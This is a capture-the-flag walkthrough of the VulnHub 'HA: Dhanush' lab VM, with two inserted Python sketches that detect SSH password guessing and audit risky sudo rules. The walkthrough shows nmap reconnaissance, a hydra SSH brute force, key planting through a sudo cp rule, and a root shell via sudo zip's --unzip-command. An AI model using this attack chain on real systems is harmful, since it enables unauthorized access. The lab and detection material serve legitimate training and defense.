HA_DHANUSH – (VULNHUB)

VM Link: http://download.vulnhub.com/ha/dhanush.zip

root@kali:~/Downloads# nmap -A 192.168.135.131
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-30 16:12 GMT
Nmap scan report for 192.168.135.131
Host is up (0.00032s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Dhanush
MAC Address: 00:0C:29:22:66:8B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms 192.168.135.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.27 seconds

Open the site in a browser:

http://192.168.135.131/

root@kali:~/Downloads# cewl http://192.168.135.131/ -w dict.txt
CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root@kali:~/Downloads# cat dict.txt
Dhanush
धनुष
Lord
Feature
Wielded
the
यदा
युगे
Arjuna
was
able
his
and
Then
path
The
Header
लानिर
भवति
भारत
युत
थानमधर
तदात
मानं
सृजाम
यहम
परित
राणाय
साधूनां
विनाशाय
दुष
कृताम
मसंस
थापनार
थाय
भवामि
What
Banner
Dhanushधनुष
Weapon
for
shooting
arrows
typically
made
curved
piece
wood
joined
both
ends
Taut
String
दुनिया
सबसे
तिशाली
धनुषWorld
Most
Powerful
Dhanushs
Sharang
Dhanushसारंग
Vishnu
Made
Viswakarma
Pinak
Dhanushपिनाक
ShivaMade
pinak
Gandiv
Dhanushगाण
डीव
ArjunaMade
Brahma
Portfolio
Choose
Yoursअपना
चुनें
Heat
Mahabharata
not
lift
against
Family
Gurus
Krishna
tells
him
this
Dhram
Eternal
Truth
war
You
CTF
Warrior
Pick
your
attain
Boot
Hacking
Articles
All
rights
reserved
Scripts
Raj
Aarti
Geet
Yashika
Kavish
Rishab
Japneet
Pavan

root@kali:~/Downloads# hydra -L dict.txt -P dict.txt 192.168.135.131 ssh -s 65345 -e nsr
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-30 16:33:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 13338 login tries (l:114/p:117), ~834 tries per task
[DATA] attacking ssh://192.168.135.131:65345/
[STATUS] 214.00 tries/min, 214 tries in 00:01h, 13127 to do in 01:02h, 16 active
[STATUS] 149.33 tries/min, 448 tries in 00:03h, 12893 to do in 01:27h, 16 active

login : pinak
password : Gandiv
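
On the defending side, a run like the Hydra one above stands out in the SSH auth log. The sketch below is an added example, not part of the original walkthrough: it flags a source that exceeds a failure threshold inside a sliding window and any accepted login that follows from the same source. The log lines, the source address 192.168.135.128 and the thresholds are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH auth log: "Failed password for [invalid user] NAME from IP port N ssh2"
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect(lines, year=2019, threshold=5, window=timedelta(seconds=60)):
    """Alert on a source reaching `threshold` failures inside `window`,
    and on any accepted login from a source that was already flagged."""
    recent = defaultdict(deque)   # ip -> timestamps of recent failures
    users = defaultdict(set)      # ip -> distinct usernames tried
    flagged, alerts = set(), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            q = recent[ip]
            q.append(ts)
            users[ip].add(user)
            while ts - q[0] > window:      # drop failures outside the window
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("guessing", ip, len(users[ip])))
        elif ip in flagged:
            alerts.append(("login-after-guessing", ip, user))
    return alerts

# Constructed sample log (not taken from the VM); usernames come from dict.txt.
SAMPLE = [
    f"Nov 30 16:34:{s:02d} ubuntu sshd[2101]: Failed password for "
    f"invalid user {u} from 192.168.135.128 port 4{s:04d} ssh2"
    for s, u in enumerate(["Dhanush", "Lord", "Arjuna", "Vishnu", "Shiva", "Brahma"])
] + [
    "Nov 30 16:34:09 ubuntu sshd[2101]: Failed password for pinak from 192.168.135.128 port 40100 ssh2",
    "Nov 30 16:34:10 ubuntu sshd[2102]: Accepted password for pinak from 192.168.135.128 port 40101 ssh2",
    "Nov 30 16:40:00 ubuntu sshd[2200]: Accepted password for sarang from 192.168.0.100 port 50000 ssh2",
]

if __name__ == "__main__":
    print(*detect(SAMPLE), sep="\n")
```

The "login-after-guessing" alert is the one worth paging on: it marks the moment a guessed password worked.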

root@kali:~/Downloads# ssh pinak@192.168.135.131 -p 65345
The authenticity of host '[192.168.135.131]:65345 ([192.168.135.131]:65345)' can't be established.
ECDSA key fingerprint is SHA256:QVJEE1sfL5RUI7RaUefp0Cr9woMla1AyMzYAY683i5s.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.135.131]:65345' (ECDSA) to the list of known hosts.
pinak@192.168.135.131's password: Gandiv
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Last login: Fri Nov 8 09:05:56 2019

pinak@ubuntu:~$

pinak@ubuntu:~$ sudo -l
Matching Defaults entries for pinak on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pinak may run the following commands on ubuntu:
(sarang) NOPASSWD: /bin/cp
pinak@ubuntu:~$ cd /home/sarang
pinak@ubuntu:/home/sarang$ ls -la
total 32
drwxr-xr-x 4 sarang sarang 4096 Nov 8 08:03 .
drwxr-xr-x 5 root root 4096 Nov 7 21:01 ..
-rw------- 1 sarang sarang 1 Nov 8 09:07 .bash_history
-rw-r--r-- 1 sarang sarang 220 Nov 7 21:01 .bash_logout
-rw-r--r-- 1 sarang sarang 3771 Nov 7 21:01 .bashrc
drwx------ 2 sarang sarang 4096 Nov 7 21:07 .cache
-rw-r--r-- 1 sarang sarang 807 Nov 7 21:01 .profile
drwx------ 2 sarang sarang 4096 Nov 7 21:35 .ssh
pinak@ubuntu:/home/sarang$ cd .ssh
-bash: cd: .ssh: Permission denied

pinak@ubuntu:/home/sarang$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/pinak/.ssh/id_rsa):
Created directory '/home/pinak/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/pinak/.ssh/id_rsa.
Your public key has been saved in /home/pinak/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:6zFqbvYav9knzOEEKvi/1SM+ZhauqGHol/So7qX4Lwc pinak@ubuntu
The key's randomart image is:
+---[RSA 2048]----+
| |
| |
| |
| . |
| . .S. |
| .E.. . .oo |
|. +++...**o. |
|o.+=oo+B**=.. |
|+B==o*BOBo.o |
+----[SHA256]-----+

pinak@ubuntu:/$ cd ~/.ssh
pinak@ubuntu:~/.ssh$ ls -la
total 16
drwx------ 2 pinak pinak 4096 Nov 30 08:54 .
drwxr-xr-x 4 pinak pinak 4096 Nov 30 08:54 ..
-rw------- 1 pinak pinak 1675 Nov 30 08:54 id_rsa
-rw-r--r-- 1 pinak pinak 394 Nov 30 08:54 id_rsa.pub

pinak@ubuntu:~/.ssh$ chmod 777 id_rsa.pub
pinak@ubuntu:~/.ssh$ cp id_rsa.pub /home/pinak
pinak@ubuntu:~/.ssh$ cd ..

pinak@ubuntu:~$ sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys
pinak@ubuntu:~$ ssh sarang@127.0.0.1 -i /.ssh/id_rsa -p 65345
Warning: Identity file /.ssh/id_rsa not accessible: No such file or directory.
The authenticity of host '[127.0.0.1]:65345 ([127.0.0.1]:65345)' can't be established.
ECDSA key fingerprint is SHA256:QVJEE1sfL5RUI7RaUefp0Cr9woMla1AyMzYAY683i5s.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[127.0.0.1]:65345' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Last login: Thu Nov 7 21:35:24 2019 from 192.168.0.100
sarang@ubuntu:~$ sudo -l
Matching Defaults entries for sarang on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sarang may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/zip
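
Both sudo -l listings above (cp as sarang, zip as root) are the kind of rule a sudoers review should catch. The following is an added example, not part of the original walkthrough: it parses sudo -l output and flags rules for binaries that can write files or start other programs, noting when no password is required. The RISKY set and the third sample are constructed assumptions, and the set is not exhaustive.

```python
import re

# Assumption: a constructed, non-exhaustive set of binaries that can write
# files or start other programs. cp and zip are the two this page shows.
RISKY = {"cp": "file write", "tee": "file write", "zip": "command execution",
         "tar": "command execution", "find": "command execution"}

RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG = re.compile(r"^(?P<tag>[A-Z_]+):\s*")   # NOPASSWD:, SETENV:, ...

def audit(sudo_l_output):
    """Parse `sudo -l` output into (runas, command, reason) findings."""
    findings, in_rules = [], False
    for line in sudo_l_output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        rest, tags = m["rest"], set()
        while (t := TAG.match(rest)):        # peel leading tags off the rule
            tags.add(t["tag"])
            rest = rest[t.end():]
        for cmd in filter(None, (c.strip() for c in rest.split(","))):
            binary = cmd.split()[0]
            name = binary.rsplit("/", 1)[-1]
            if binary == "ALL":
                reason = "unrestricted"
            elif name in RISKY:
                reason = RISKY[name]
            else:
                continue                      # not in the risky set
            if "NOPASSWD" in tags:
                reason += ", no password"
            findings.append((m["runas"], cmd, reason))
    return findings

# The two rule sets from this page (Defaults lines omitted) and one constructed.
PINAK = "User pinak may run the following commands on ubuntu:\n(sarang) NOPASSWD: /bin/cp\n"
SARANG = "User sarang may run the following commands on ubuntu:\n(root) NOPASSWD: /usr/bin/zip\n"
OTHER = ("User deploy may run the following commands on web01:\n"
         "(root) /usr/bin/systemctl status nginx\n(ALL : ALL) ALL\n")

if __name__ == "__main__":
    for sample in (PINAK, SARANG, OTHER):
        print(audit(sample))
```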

sarang@ubuntu:~$ touch raj
sarang@ubuntu:~$ pwd
/home/sarang
sarang@ubuntu:~$ sudo zip /tmp/raj.zip /home/sarang/raj -T --unzip-command="sh -c /bin/bash"
adding: home/sarang/raj (stored 0%)
root@ubuntu:~# cd /root
root@ubuntu:/root# ls
flag.txt
root@ubuntu:/root# cat flag.txt

@p
@@@.
@@@@@
@@@@@@@
*”`]@P ^^
]@P
]@P
,,,, ]@P ,,gg,,
g@@@@@@@@@b ]@P ,@@@@@@@@@@g,
,@@@@@@BNPPNB@@@@@@@@@@@@@@@@P**PNB@@@@@w
g@@@@P^` %NNNNN@NNNNNP *B@@@g
g@@@P` -@ “B@@w
,@@@` ]@ %@@,
@@P- ]@ *@@,
,@@” ]@ *B@
,@N” y@@B %@,
,, g@P- ]@@@P *Bg ,gg
@@@@$,,,,,,,,,,,,,,,,,,,,,,,,,,ggggg@@@@wwwwwwwwwgggggggggww==========mm4NNN”

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Nisha Sharma : https://in.linkedin.com/in/nishasharmaa

+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
____________________________________

@SAKSHAM DIXIT